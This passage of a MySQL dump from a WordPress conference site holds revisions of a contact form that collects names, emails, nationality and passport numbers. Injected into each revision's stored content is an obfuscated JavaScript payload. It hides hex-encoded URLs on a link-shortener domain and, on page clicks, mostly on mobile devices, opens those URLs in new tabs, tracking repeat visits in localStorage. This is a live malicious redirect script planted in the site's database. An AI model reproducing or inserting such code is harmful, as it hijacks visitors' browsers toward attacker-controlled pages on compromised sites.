)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Simple Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 22:46:55','2023-08-20 22:46:55','',5345,'https://gsw2023.com/?p=5350',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(5351,1,'2023-08-20 22:49:11','2023-08-20 22:49:11','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"ID on Conftool\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Comment or Message\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Single Line Text\",\"description\":\"Dear GSW 2023 participants \\r\\nI hope this message finds you well. \\r\\nWe looking forward to see you in Cairo in GSW 2023. \\r\\nWe need to fill the following form to help us as a tool in conference management \\r\\nPlease we wish to receive it by 23rd August 2023.\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"number\",\"label\":\"Passport No.\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"}},\"id\":\"5345\",\"field_id\":7,\"settings\":{\"form_title\":\"Simple Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Simple Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 22:49:11','2023-08-20 22:49:11','',5345,'https://gsw2023.com/?p=5351',0,'revision','',0),
(5352,1,'2023-08-20 22:50:04','2023-08-20 22:50:04','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Nationality\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"number\",\"label\":\"Passport No.\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Comment or Message\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Single Line Text\",\"description\":\"Dear GSW 2023 participants \\r\\nI hope this message finds you well. \\r\\nWe looking forward to see you in Cairo in GSW 2023. \\r\\nWe need to fill the following form to help us as a tool in conference management \\r\\nPlease we wish to receive it by 23rd August 2023.\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"}},\"id\":\"5345\",\"field_id\":7,\"settings\":{\"form_title\":\"Simple Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 